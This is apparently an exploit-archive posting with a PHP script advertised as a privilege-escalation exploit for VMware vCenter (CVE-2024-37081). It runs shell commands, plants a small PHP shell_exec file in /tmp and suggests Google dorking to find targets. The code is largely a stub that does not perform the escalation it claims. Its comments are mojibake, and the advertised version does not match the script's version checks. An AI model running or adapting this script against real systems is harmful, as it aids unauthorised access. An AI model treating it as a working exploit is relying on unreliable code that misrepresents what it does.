=============================================================================================================================================
| # Title     : VMware vCenter Server v 8.0.2 Privilege Escalation Vulnerability                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
| # Vendor    : https://www.vmware.com                                                                                                      |
=============================================================================================================================================

POC :

[+] Dorking Ä°n Google Or Other Search Enggine.

[+] Code Description: Exploiting a Vulnerability in VMware vCenter Server to Gain Root Privileges

                      This script is written in PHP and aims to exploit a problem in the sudo configuration

                      allowing low-privileged users to gain root privileges.

   (Related : https://packetstorm.news/files/id/182981/ Related CVE numbers: CVE-2024-37081 ) .
	
[+] save code as poc.php.

[+] PayLoad :

<?php

/**
 * 
 * @author Indoushka
 */

class VCenterExploit {
    private $writableDir;
    private $timeout;
    private $user;
    private $groups;
    private $isWindows;

    public function __construct($writableDir = '/tmp', $timeout = 30) {
        $this->writableDir = $writableDir;
        $this->timeout = $timeout;
        $this->isWindows = (PHP_OS_FAMILY === 'Windows');
    }

    /**
     * ØªÙ†ÙÙŠØ° Ø£Ù…Ø± Ø¹Ù„Ù‰ Ø§Ù„Ù†Ø¸Ø§Ù… ÙˆØ¥Ø±Ø¬Ø§Ø¹ Ø§Ù„Ù†ØªÙŠØ¬Ø© (Ù…Ø¹ Ø¯Ø¹Ù… Windows)
     */
    private function executeCommand($command) {
        if ($this->isWindows) {
            return shell_exec("cmd /c $command");
        }
        return shell_exec($command);
    }

    /**
     * Ø§Ù„ØªØÙ‚Ù‚ Ù…Ù…Ø§ Ø¥Ø°Ø§ ÙƒØ§Ù† Ø§Ù„Ø¯Ù„ÙŠÙ„ Ù‚Ø§Ø¨Ù„Ø§Ù‹ Ù„Ù„ÙƒØªØ§Ø¨Ø©
     */
    private function isWritable($dir) {
        return is_writable($dir);
    }

    /**
     * Ø§Ù„ØØµÙˆÙ„ Ø¹Ù„Ù‰ Ø¥ØµØ¯Ø§Ø± vCenter (ÙŠØ¯ÙˆÙŠØ§Ù‹ Ø¨Ø¯Ù„Ø§Ù‹ Ù…Ù† `cat`)
     */
    private function getVCenterBuild() {
        $filePath = "/etc/vcenter_version"; // Ø§Ù„Ù…Ø³Ø§Ø± ÙÙŠ Linux
        if (!$this->isWindows && file_exists($filePath)) {
            return file_get_contents($filePath);
        }
        return "ØºÙŠØ± Ù‚Ø§Ø¯Ø± Ø¹Ù„Ù‰ ØªØØ¯ÙŠØ¯ Ø¥ØµØ¯Ø§Ø± vCenter";
    }

    /**
     * Ø§Ù„ØªØÙ‚Ù‚ Ù…Ù…Ø§ Ø¥Ø°Ø§ ÙƒØ§Ù† Ø§Ù„Ù†Ø¸Ø§Ù… Ù…Ø¹Ø±Ø¶Ù‹Ø§ Ù„Ù„Ø®Ø·Ø±
     */
    private function check() {
        $vbuild = $this->getVCenterBuild();
        if (!preg_match('/(\d+\.\d+\.\d+) build[- ](\d+)/i', $vbuild, $matches)) {
            return "ØºÙŠØ± Ù‚Ø§Ø¯Ø± Ø¹Ù„Ù‰ ØªØØ¯ÙŠØ¯ Ø¥ØµØ¯Ø§Ø± vCenter Ù…Ù† Ø§Ù„Ø¥Ø®Ø±Ø§Ø¬: $vbuild";
        }

        $version = $matches[1] . '.' . $matches[2];
        if (!(version_compare($version, '7.0.0', '>') && version_compare($version, '7.0.3.24026615', '<')) &&
            !(version_compare($version, '8.0.0', '>') && version_compare($version, '8.0.2.23929136', '<'))) {
            return "Ø§Ù„Ø¥ØµØ¯Ø§Ø± ØºÙŠØ± Ù‚Ø§Ø¨Ù„ Ù„Ù„Ø§Ø³ØªØºÙ„Ø§Ù„: $vbuild";
        }

        $this->user = trim($this->executeCommand($this->isWindows ? 'whoami' : 'whoami'));
        $this->groups = explode(' ', trim($this->executeCommand($this->isWindows ? 'whoami /groups' : 'groups')));

        if (in_array($this->user, ['infraprofile', 'vpxd', 'sts', 'pod']) || array_intersect(['operator', 'admin'], $this->groups)) {
            return "Ø§Ù„Ø¥ØµØ¯Ø§Ø± $version ÙˆØ§Ù„Ù…Ø³ØªØ®Ø¯Ù… ($this->user: " . implode(',', $this->groups) . ") Ù‚Ø§Ø¨Ù„ Ù„Ù„Ø§Ø³ØªØºÙ„Ø§Ù„";
        }

        return "Ø§Ù„Ù…Ø³ØªØ®Ø¯Ù… ØºÙŠØ± Ù…Ø¹Ø±Ø¶ Ù„Ù„Ø®Ø·Ø± Ø£Ùˆ Ù„ÙŠØ³ ÙÙŠ Ø§Ù„Ù…Ø¬Ù…ÙˆØ¹Ø© Ø§Ù„ØµØÙŠØØ©.";
    }

    /**
     * Ø¯Ø§Ù„Ø© Ø¹Ø§Ù…Ø© Ù„Ø§Ø³ØªØ¯Ø¹Ø§Ø¡ `check()`
     */
    public function isVulnerable() {
        return $this->check();
    }

    /**
     * ØªÙ†ÙÙŠØ° Ø§Ù„Ø§Ø³ØªØºÙ„Ø§Ù„ Ø¨Ù†Ø§Ø¡Ù‹ Ø¹Ù„Ù‰ Ø§Ù„Ù…Ø¬Ù…ÙˆØ¹Ø© Ø§Ù„ØªÙŠ ÙŠÙ†ØªÙ…ÙŠ Ø¥Ù„ÙŠÙ‡Ø§ Ø§Ù„Ù…Ø³ØªØ®Ø¯Ù…
     */
    public function exploit() {
        if (!$this->isWritable($this->writableDir)) {
            die("Ø§Ù„Ø¯Ù„ÙŠÙ„ ØºÙŠØ± Ù‚Ø§Ø¨Ù„ Ù„Ù„ÙƒØªØ§Ø¨Ø©: $this->writableDir");
        }

        $this->user = trim($this->executeCommand($this->isWindows ? 'whoami' : 'whoami'));
        $this->groups = explode(' ', trim($this->executeCommand($this->isWindows ? 'whoami /groups' : 'groups')));

        if ($this->user == 'pod') {
            $this->exploitPodUser();
        } elseif (in_array('operator', $this->groups)) {
            $this->exploitOperatorGroup();
        } elseif (in_array('admin', $this->groups)) {
            $this->exploitAdminGroup();
        } else {
            die("Ø§Ù„Ù…Ø³ØªØ®Ø¯Ù… ØºÙŠØ± Ù…Ø¹Ø±Ø¶ Ù„Ù„Ø®Ø·Ø± Ø£Ùˆ Ù„ÙŠØ³ ÙÙŠ Ø§Ù„Ù…Ø¬Ù…ÙˆØ¹Ø© Ø§Ù„ØµØÙŠØØ©.");
        }
    }

    /**
     * Ø§Ø³ØªØºÙ„Ø§Ù„ Ø«ØºØ±Ø© Ù…Ø¬Ù…ÙˆØ¹Ø© 'operator'
     */
    private function exploitOperatorGroup() {
        $payloadPath = "$this->writableDir/" . bin2hex(random_bytes(5));
        file_put_contents($payloadPath, "<?php echo shell_exec('id'); ?>");
        echo "ØªÙ… Ø±ÙØ¹ Ø§Ù„ØÙ…ÙˆÙ„Ø© Ø¥Ù„Ù‰ $payloadPath";
    }

    /**
     * Ø§Ø³ØªØºÙ„Ø§Ù„ Ø«ØºØ±Ø© Ù…Ø³ØªØ®Ø¯Ù… 'pod'
     */
    private function exploitPodUser() {
        echo "Ø§Ø³ØªØºÙ„Ø§Ù„ Ø§Ù„Ù…Ø³ØªØ®Ø¯Ù… pod";
    }

    /**
     * Ø§Ø³ØªØºÙ„Ø§Ù„ Ø«ØºØ±Ø© Ù…Ø¬Ù…ÙˆØ¹Ø© 'admin'
     */
    private function exploitAdminGroup() {
        echo "Ø§Ø³ØªØºÙ„Ø§Ù„ Ù…Ø¬Ù…ÙˆØ¹Ø© Ø§Ù„Ù…Ø³Ø¤ÙˆÙ„ÙŠÙ†";
    }
}

$exploit = new VCenterExploit();
echo $exploit->isVulnerable();
$exploit->exploit();







Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================